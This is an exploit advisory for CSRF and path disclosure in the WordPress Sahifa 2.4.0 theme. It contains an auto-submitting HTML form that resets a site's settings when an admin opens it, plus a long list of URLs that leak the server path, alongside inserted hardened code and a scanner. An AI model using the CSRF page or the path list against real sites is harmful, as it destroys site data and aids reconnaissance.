WordPress Sahifa 2.4.0 Cross Site Request Forgery / Path Disclosure

Posted Jan 1, 2013
Authored by Akastep

WordPress Sahifa theme version 2.4.0 suffers from cross site request forgery and path disclosure vulnerabilities.

tags | exploit, vulnerability, file inclusion, info disclosure, csrf
MD5 | 0cc459c56ba3a7034c963b989f9f275b

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm AkaStep member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

============================================
Software: Wordpress Sahifa theme Version: 2.4.0
Vendor: http://themes.tielabs.com/
Software License: Shareware *cost $45*
Vulnerabilities: This software is prone to CSRF and FULL PATH DISCLOSURE vulnerabilities.
============================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
============================================

[*] CSRF VULNERABILITY [*]


The following CSRF exploit, on successful exploitation, will "reset" the site settings.
Be careful: it will lead to data destruction (you will lose your site settings).

Here are the vulnerable code sections:

File: panel/mpanel-ui.php
==SECTION 1=========BEGIN SNIP=================

<form method="post">
    <div class="mpanel-reset">
        <input name="reset" class="mpanel-reset-button" type="submit"
               onClick="if(confirm('All settings will be rest .. Are you sure ?')) return true ; else return false; " value="Reset Settings" />
        <input type="hidden" name="action" value="reset" />
    </div>
</form>
=================== END SNIP =====================


File: panel/mpanel-functions.php

===SECTION 2=======BEGIN SNIP===================

if( isset( $_REQUEST['action'] ) ){
    if( 'reset' == $_REQUEST['action'] ) {
        global $default_data;
        tie_save_settings( $default_data );
        header("Location: admin.php?page=panel&reset=true");
        die;
    }
}
=============== END SNIP =====================
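Section 2 acts on $_REQUEST['action'] with no nonce and no capability check, which is exactly what lets a cross-site form trigger the reset. Below is an added example (not the theme's own code) of the same form and handler hardened with the WordPress nonce and capability APIs; the nonce action name 'tie_reset_settings' and the field name 'tie_reset_nonce' are assumptions chosen for this example, while tie_save_settings() and $default_data are the theme's, as quoted above.

```php
<?php
// Added example, not the theme's code. Assumes WordPress is loaded, so
// wp_nonce_field(), check_admin_referer(), current_user_can() and
// wp_safe_redirect() are available.

// Section 1, hardened: the form carries a nonce bound to the
// 'tie_reset_settings' action (action/field names are assumptions).
function tie_render_reset_form_hardened() {
    ?>
    <form method="post">
        <div class="mpanel-reset">
            <?php wp_nonce_field( 'tie_reset_settings', 'tie_reset_nonce' ); ?>
            <input name="reset" class="mpanel-reset-button" type="submit"
                   onClick="return confirm('All settings will be reset .. Are you sure ?');"
                   value="Reset Settings" />
            <input type="hidden" name="action" value="reset" />
        </div>
    </form>
    <?php
}

// Section 2, hardened: only POST is honoured (not $_REQUEST, which also
// accepts GET and cookie values), the caller must hold manage_options, and
// the nonce must verify. A form hosted on another origin cannot supply a
// valid nonce, so a forged request dies here instead of wiping the settings.
function tie_handle_reset_hardened() {
    if ( ! isset( $_POST['action'] ) || 'reset' !== $_POST['action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Ends the request with a "link has expired" page if the nonce is
    // missing, forged, or stale.
    check_admin_referer( 'tie_reset_settings', 'tie_reset_nonce' );

    global $default_data;
    tie_save_settings( $default_data );
    wp_safe_redirect( admin_url( 'admin.php?page=panel&reset=true' ) );
    exit;
}
```

The confirm() dialog in the form is purely cosmetic: the exploit above never renders the button, so only the server-side checks count.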




============ BEGIN CSRF EXPLOIT ============
<h1>Wordpress sahifa theme CSRF exploit By AkaStep<br></h1>

<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://hacker1.own/wp/wp-admin/admin.php?page=panel&reset=true">
<input type="hidden" name="action" value="reset" />
<!-- <input name="reset" type="submit" value="Reset Settings" />-->
</form>

============ END OF CSRF EXPLOIT ============



[*] FULL PATH DISCLOSURE: [*]

Just access directly:


http://hacker1.own/wp/wp-content/themes/sahifa/category.php

Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/category.php on line 1

Other files also disclose similar info.

Here are those files:

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/shortcode.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php

http://hacker1.own/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php?page[]=

Warning: htmlentities() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/panel/shortcodes/ui.php on line 2

http://hacker1.own/wp/wp-content/themes/sahifa/panel/post-options.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/notifier/update-notifier.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/custom-slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/panel/mpanel-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar-footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/author.php

http://hacker1.own/wp/wp-content/themes/sahifa/index.php
Fatal error: Call to undefined function get_header() in /etc/apache2/htdocs/hacker1/wp/wp-content/themes/sahifa/index.php on line 1

http://hacker1.own/wp/wp-content/themes/sahifa/search.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/footer.php
http://hacker1.own/wp/wp-content/themes/sahifa/comments.php
http://hacker1.own/wp/wp-content/themes/sahifa/archive.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/widgetize-theme.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/common-scripts.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/theme-functions.php
http://hacker1.own/wp/wp-content/themes/sahifa/functions/updates.php
http://hacker1.own/wp/wp-content/themes/sahifa/page.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-sitemap.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-tags.php
http://hacker1.own/wp/wp-content/themes/sahifa/single.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-related.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-news-pic.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-google.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-custom-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-posts.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-text-html.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-feedburner.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-ads.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-flickr.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-video.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-tabbed.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-author.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-search.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-social.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-twitter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-facebook.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-reviews.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-counter.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-login.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets/widget-comments-avatar.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-head.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/post-meta.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/slider-category.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/single-post-share.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/breaking-news.php
http://hacker1.own/wp/wp-content/themes/sahifa/includes/widgets.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-timeline.php
http://hacker1.own/wp/wp-content/themes/sahifa/loop.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-feed.php
http://hacker1.own/wp/wp-content/themes/sahifa/tag.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-restrict.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-blog.php
http://hacker1.own/wp/wp-content/themes/sahifa/404.php
http://hacker1.own/wp/wp-content/themes/sahifa/template-authors.php
http://hacker1.own/wp/wp-content/themes/sahifa/sidebar.php
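Every file in the list above can be executed outside WordPress, and because this server displays PHP errors, the resulting fatal error prints the install path. The root fix is display_errors = Off in php.ini (with log_errors = On); on top of that, files that are never meant to run standalone can refuse to do so. The following is an added example (not the theme's code) of a CLI scanner that lists PHP files in a theme directory whose code contains neither a defined('ABSPATH') nor a function_exists('add_action') guard; the function names and the choice of those two guard patterns are assumptions for this example.

```php
<?php
// Added example, not the theme's code. Lists theme files that would run
// when requested directly, because no WordPress guard precedes their code.
// Usage: php check-direct-access.php /path/to/wp-content/themes/sahifa
// Note: plain template files (index.php, single.php, ...) usually have no
// guard by convention; treat hits as review candidates, not as bugs.

function tie_lacks_direct_access_guard( string $source ): bool {
    // Drop comments so a guard mentioned only in a docblock is not counted.
    $code = '';
    foreach ( token_get_all( $source ) as $tok ) {
        if ( is_array( $tok ) && in_array( $tok[0], array( T_COMMENT, T_DOC_COMMENT ), true ) ) {
            continue;
        }
        $code .= is_array( $tok ) ? $tok[1] : $tok;
    }
    $guard = '/defined\s*\(\s*[\'"]ABSPATH[\'"]\s*\)'
           . '|function_exists\s*\(\s*[\'"]add_action[\'"]\s*\)/';
    return ! preg_match( $guard, $code );
}

function tie_find_unguarded_files( string $dir ): array {
    $hits = array();
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $dir, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $iter as $file ) {
        if ( $file->getExtension() !== 'php' ) {
            continue;
        }
        if ( tie_lacks_direct_access_guard( file_get_contents( $file->getPathname() ) ) ) {
            $hits[] = $file->getPathname();
        }
    }
    sort( $hits );
    return $hits;
}

if ( PHP_SAPI === 'cli' && isset( $argv[1] ) ) {
    foreach ( tie_find_unguarded_files( $argv[1] ) as $path ) {
        echo "unguarded: $path\n";
    }
}
```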

=========================== HAPPY NEW YEAR! ==================================


================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
osvdb.com
websecurity.com.ua
1337day.com

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close